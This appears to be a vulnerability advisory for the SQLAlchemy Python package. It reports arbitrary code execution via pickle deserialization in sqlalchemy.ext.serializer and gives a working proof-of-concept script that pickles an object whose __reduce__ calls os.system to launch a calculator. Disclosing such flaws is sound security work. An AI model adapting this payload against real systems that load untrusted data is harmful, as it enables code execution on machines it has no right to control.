sqlalchemy

vulnerability arbitrary code execution
severity 3.8
language python
registry pypi

Description

SQLAlchemy is the Python SQL toolkit and Object Relational Mapper that gives application developers the full power and flexibility of SQL. SQLAlchemy provides a full suite of well known enterprise-level persistence patterns, designed for efficient and high-performing database access, adapted into a simple and Pythonic domain language.

  • Vulnerability description untrusted loading of data by the pickle.load function leading to Arbitrary code execution.

Proof of Concept

Run exploit.py

import os
import pickle
#os.system('pip3 install sqlalchemy')
from sqlalchemy.ext import serializer
#payload formation
class ArbitraryCode:
    def __reduce__(self):
        cmd = ('xcalc')
        return os.system, (cmd,)
#exploiting
dumps = pickle.dumps(ArbitraryCode())
serializer.loads(dumps,dumps)
  • pip3 install sqlalchemy
  • python3 exploit.py

References